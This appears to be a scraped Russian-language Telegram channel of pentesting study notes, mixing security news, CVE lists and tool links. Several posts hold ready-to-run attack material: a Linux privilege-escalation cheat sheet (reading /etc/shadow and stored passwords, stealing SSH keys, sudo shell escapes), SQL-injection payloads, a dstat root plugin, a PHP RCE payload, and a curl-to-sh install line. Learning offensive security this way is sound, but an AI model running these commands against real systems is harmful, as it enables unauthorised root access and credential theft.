Monkey Hacker – Telegram
Monkey Hacker
790 subscribers
16 photos
1 video
2 files
51 links
Мартышка просто хочет научиться пентестить
Download Telegram
Настройка маршрутизации на оборудования Cisco 🗞
🔸Настройка статической маршрутизации:
ip route 172.16.0.0 255.255.255.128 Serial0/0/0 - это команда для ввода статического маршрута
Вкратце: ip route - это команда, говорящая роутеру, что сейчас будет введен статический маршрут;
172.16.0.0 - это удаленная и неизвестная роутеру сеть; 255.255.255.128 - это маска удаленной сети; serial0/0/0 - это на какой шлюз мы хотим переслать пакеты, т.е адрес/интерфейс другого роутера
🔸Настройка RIP:
router rip - этой командой мы включаем протокол RIP на маршрутизаторе, и оказываемся в режиме конфигурации протокола
version 2 - включаем RIP Version 2
no auto-summary - отключаем автоматическое суммирование маршрутов
network <IP> - вводим сети, которые будут передаваться другим роутерам
🔸Настройка OSPF:
router ospf <NUM> - назначаем процесс ospf
router-id <ID> - прописываем id (
1.1.1.1 к примеру)
network <IP> <WILCD_CARD_MASK> area 0 – назначаем подключенные сети к роутеру
passive-interface <INTERFACE> - отключаем интерфейсы
#linux

Linux Privilege Escalation Cheat Sheet 🗞

🔸Stored Password:
OpenVPN:
1. Попробуйте написать: cat /home/user/myvpn.ovpn
2. Из вывода команды запомните путь: “auth-user-pass”.
3.Следующая команда примерно будет такой: cat /etc/openvpn/auth.txt
History:
1. Попробуйте: cat ~/.bash_history | grep -i passw
🔸Weak File Permission:
1. cat /etc/passwd
2. unshadow <PASSWORD-FILE> <SHADOW-FILE> > unshadowed.txt
3. hashcat -m 1800 unshadowed.txt rockyou.txt -O
🔸SSH-Keys:
1. find / -name authorized_keys 2> /dev/null
2. find / -name id_rsa 2> /dev/null
3. Скопируйте содержимое id_rsa на атакующую машину
4. chmod 400 id_rsa
5. ssh -i id_rsa root@<ip>
🔸Shell-Escalating:
1. Попробуйте выполнить следующее: sudo find /bin -name nano -exec /bin/sh \;
sudo awk 'BEGIN {system("/bin/sh")}'
echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --noscript=shell.nse
sudo vim -c '!sh'
🔸Abusing Intended Functionality:
На примере Apach2:
sudo apache2 -f /etc/shadow
Уже из основной машины: '[Pasted Root Hash]' > hash.txt И john --wordlist=/usr/share/wordlists/nmap.lst hash.txt
🔸SUID Environment Variables:
1. find / -type f -perm -04000 -ls 2>/dev/null
2. strings /usr/local/bin/suid-env
🔸Capability:
1. getcap -r / 2>/dev/null
2. Запомните значение: “cap_setuid”
3. /usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
👍4
#sql

Основные моменты по SQL-инъекциям 💉

🔸In-Band SQL Injection
In-Band SQL Injection - самый простой тип для обнаружения и эксплуатации; In-Band означает, что для эксплуатации уязвимости используется один и тот же метод связи, а также получение результатов, например, обнаружение уязвимости SQL Injection на странице веб-сайта, а затем возможность извлечь данные из базы данных на той же странице.
🔸Error-Based -SQL
Этот тип SQL-инъекции наиболее полезен для легкого получения информации о структуре базы данных, поскольку сообщения об ошибках из базы данных выводятся прямо на экран браузера. Часто его можно использовать для перечисления всей базы данных.
Union-Based SQL Injection
Этот тип инъекции использует оператор SQL UNION вместе с оператором SELECT для возврата дополнительных результатов на страницу. Этот метод является наиболее распространенным способом извлечения больших объемов данных через уязвимость SQL Injection.
0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '<br>') FROM staff_users
🔸Blind-SQLi
В отличие от In-Band SQL injection, когда мы можем видеть результаты нашей атаки прямо на экране, blind SQLi - это когда мы практически не получаем обратной связи, чтобы подтвердить, были ли наши введенные запросы успешными или нет, это происходит потому, что сообщения об ошибках отключены, но инъекция все равно работает. Вас может удивить, что для успешного перебора целой базы данных нам нужен лишь небольшой отклик.
🔸Boolean-Based
SQL-инъекция на основе булевых функций относится к ответу, который мы получаем в ответ на наши попытки инъекции и который может быть истинным/ложным, да/нет, вкл/выкл, 1/0 или любым другим ответом, который может иметь только два исхода. Этот результат подтверждает, что наша полезная нагрузка SQL Injection была либо успешной, либо нет. На первый взгляд, вам может показаться, что такой ограниченный ответ не может дать много информации. Но на самом деле, используя только эти два ответа, можно перечислить структуру и содержимое целой базы данных.
admin123' UNION SELECT 1,2,3 from users where username='admin' and password like 'a%
🔸Time-Based SQLi
Слепая SQL-инъекция, основанная на времени, очень похожа на вышеописанную булеву инъекцию, поскольку отправляются те же самые запросы, но нет визуального индикатора того, что ваши запросы на этот раз неправильные или правильные. Вместо этого индикатором правильности запроса служит время, которое требуется для его выполнения. Эта временная задержка вводится за счет использования встроенных методов, таких как SLEEP(x), наряду с оператором UNION. Метод SLEEP() будет выполняться только после успешного выполнения оператора UNION SELECT.
Так, например, при попытке определить количество столбцов в таблице можно использовать следующий запрос:
admin123' UNION SELECT SLEEP(5);--.
Методы идентификации SQL-injection:
▫️Самый очевидный метод - ввести в поля одинарную кавычку ' и проверить ошибки.
▫️Вводите булевы условия типа "ИЛИ 1=1", "ИЛИ 4=9" и т.д. и выявляйте аномалии в ответах.
▫️Фаззинг с полезными нагрузками SQL и наблюдение за ошибками
▫️Фаззинг с различными полезными нагрузками, основанными на времени, и проверка задержек в ответах
▫️SqlMap
▫️Acunetix, BurpSuite, OWASP ZAP, Wapiti
👍2
Немного про UAC и его методы обхода 📄

#windows

Контроль учетных записей пользователей (UAC) - это функция безопасности
Windows, которая заставляет любой новый процесс по умолчанию запускаться в
контексте безопасности непривилегированной учетной записи. Эта политика
применяется к процессам, запущенным любым пользователем, включая самих
администраторов. Идея заключается в том, что мы не можем полагаться только на
личность пользователя, чтобы определить, должны ли некоторые действия быть
разрешены.

https://telegra.ph/Bypass-UAC-07-18
#ssti

SSTI Payload Generator

Данный инструмент генерирует полезную нагрузку для эксплуатации SSTI-Java.
Применял много раз для решение машин на HTB.
Сам инструмент:
https://github.com/VikasVarshney/ssti-payload
#k8s

Про безопасность в Kubernetes📄

Среди причин, по которым Kubernetes получил столь широкое распространение - гибкость и отсутствие фрагментации. Возможно, Kubernetes не совершенен, но нельзя отрицать, что многим он нравится. Действительно, Kubernetes обеспечивает оркестровку для более чем трех четвертей контейнеризированных приложений сегодня. Но также не стоит забывать, что Kubernetes имеет свои проблемы с точки зрения безопасности, сегодня я предлагаю рассмотреть часть из них

https://telegra.ph/Pro-bezopasnost-v-K8S-08-05
#privileges

Kernel privilege escalation vulnerability collection

Коллекция уязвимостей для повышения привилегий ядра на UNIX/Windows системах, со средой компиляции, деталями уязвимости, исполняемым файлом и т.п

https://github.com/Ascotbe/Kernelhub
1🔥1
#exploit

0-day RCE vulnerability on Microsoft Exchange Server✉️

Кратко: была найдена новая уязвимость в Microsoft Exchange Server
Как ее задетектить у себя на сервере?
🔸Get-ChildItem -Recurse -Path <Path_IIS_Logs> -Filter "*.log" | Select-String -Pattern 'powershell.*autodiscover\.json.*\@.*200

Сканер по данной уязвимости:
🔸https://github.com/VNCERT-CC/0dayex-checker

Все подробности можно посмотреть здесь:
🔸https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html
#cve

CVE-2022-40684

В продуктах Fortinet (FortiOS, FortiProxy и FortiSwitchManager) была найдена уязвимость, позволяющая обойти аутентификацию и конфигурацию LDAP, путем извлечения пользователей с привилегиями администратора

Все нужные ресурсы:
🔸https://github.com/carlosevieira/CVE-2022-40684
🔸https://www.usergate.com/ru/security-reports/CVE-2022-40684
👍1
#cve202233679

Что такое Kerberos и что за CVE-2022-33679?

Решил разобраться с Kerberos, а тут еще новая вулна появилась с ней.
Данная вулна позволяет аутентифицироваться как другой пользователь, НО если пользователь был настроен на отключение стандартных требований предварительной аутентификации.

Читать тут...

Если кого-то интересует только CVE, то все полезные ресурсы вы найдете здесь:

🔘https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html
🔘https://github.com/Bdenneu/CVE-2022-33679
👍1🔥1
#windows

Полезные тулзы во время пентеста Active Directory

Список самый простой, но интересный:

🔘 Impacket - набор для работы с сетевыми протоколами в инфраструктуре AD
🔘 Bloodhound - сбор информации об инфраструктуре AD
🔘 PowerSploit - модифицирует и подготавливает скрипты для выполнения кода на машине жертвы.
🔘 Neo4j - помогает структурировать данные
🔘 Mimikatz - позволяет просматривать и сохранять учетные данные
🔘 Evil-WinRM - WinRM Shell
🔘 Kerbrute - можно сделать User Enumeration
🔘 Responder - можно сделать SMB-Relay
1
Forwarded from Proxy Bar
Рановато, но таки да
ТОП 10 из 2022

1. Follina (CVE-2022-30190)
2. Log4Shell (CVE-2021-44228)
3. Spring4Shell (CVE-2022-22965)
4. F5 BIG-IP (CVE-2022-1388)
5. Google Chrome zero-day (CVE-2022-0609)
6. Old but not forgotten - Microsoft Office bug (CVE-2017-11882)
7. ProxyNotShell (CVE-2022-41082, CVE-2022-41040)
8. Zimbra Collaboration Suite bugs (CVE-2022-27925, CVE-2022-41352)
9. Atlassian Confluence RCE flaw (CVE-2022-26134)
10. Zyxel RCE vulnerability (CVE-2022-30525)
🔥2🤔1
🧐
🤔31
Forwarded from Похек
Nuclei v2.8.0 - Fuzz all the way!

Объявление о выходе Nuclei v2.8.0 с новыми возможностями фаззинга, общими переменными для рабочих процессов, загрузкой шаблонов GitHub/AWS S3, интеграцией с asnmap, uncover и httpx и, конечно, многим другим!

Это лишь несколько основных моментов из 30+ улучшений в этом релизе. Читайте дальше, чтобы ознакомиться со всеми значительными обновлениями.

Мы также хотим поблагодарить сообщество ProjectDiscovery за 5+ вкладов, которые они внесли в Nuclei v2.8.0! В ProjectDiscovery сообщество является основой; мы гордимся нашим сообществом и командой. Мы надеемся, что вам понравится новый релиз. Счастливого взлома!

#tools
🔥3
Kubernetes + Wireshark = KubeShark

По факту, эта тулза позволяет просматривать трафик вашего кластера на K8S.
Если хотите посмотреть данную тулзу, то:

Проверяем, что есть доступ к DockerHub

Совершаем установку:
sh <(curl -Ls https://kubeshark.co/install)

Запускаем:
kubeshark tap

Выбираем нужный POD и играемся:
kubeshark tap catalogue-b87b45784-sxc8q

Также можно выбрать определенный namespace:
kubeshark tap -n sock-shop

А можно все сразу:
kubeshark tap -A

Всю документацию можно найти здесь
1👏1
Forwarded from Похек
Пак свежих и эксплуатируемых CVE для Apple:

CVE-2022-22587 (IOMobileFrameBuffer) – A malicious application may be able to execute arbitrary code with kernel privileges
CVE-2022-22594 (WebKit Storage) – A website may be able to track sensitive user information (publicly known but not actively exploited)
CVE-2022-22620 (WebKit) – Processing maliciously crafted web content may lead to arbitrary code execution
CVE-2022-22674 (Intel Graphics Driver) – An application may be able to read kernel memory
CVE-2022-22675 (AppleAVD) – An application may be able to execute arbitrary code with kernel privileges
CVE-2022-32893 (WebKit) – Processing maliciously crafted web content may lead to arbitrary code execution
CVE-2022-32894 (Kernel) – An application may be able to execute arbitrary code with kernel privileges
CVE-2022-32917 (Kernel) – An application may be able to execute arbitrary code with kernel privileges
CVE-2022-42827 (Kernel) – An application may be able to execute arbitrary code with kernel privileges
🔥3👍1
Dstat Privilege Escalation

dstat можно использовать для мониторинга и просмотра системных ресурсов. Он поддерживает настраиваемые плагины. Поэтому мы можем создать вредоносный плагин, выполняющий код и запустить dstat с правами root.

Находим директорию с dstat:
find / -type d -name dstat 2>/dev/null

Создаем плагин в той же директории, где и dstat с последующим кодом:
import os
os.system('chmod +s /usr/bin/bash')


Смотрим, что хост видит плагин:
dstat --list | grep <plugin_name>

Запускаем:
doas -u root /usr/bin/dstat –<plugin_name>

И получаем рута:
bash -p
Happy New Year 🎉🎊🎇
👍3
PHP Filter Chain Generator

Если вам нужно обойти WAF или другой механизм проверки, то существует интересная тулза, которая помогает выполнить RCE без загрузки файла, естественно если вы можете играться с параметрами php.

Но сгенерированный результат получается длинным, а на сайте может быть ограничение по количеству символов.
Следовательно, нам нужно использовать короткие формы php, чтобы сделать нашу полезную нагрузку как можно короче

Так php тэг, можно просто представить в следующем виде <?php ?> : <?= ?>

А функцию system('<cmd>'), мы можем просто заменить на ``

И самый простетский пэйлоад будет выглядеть так <?= `<cmd>` ?>
1👏1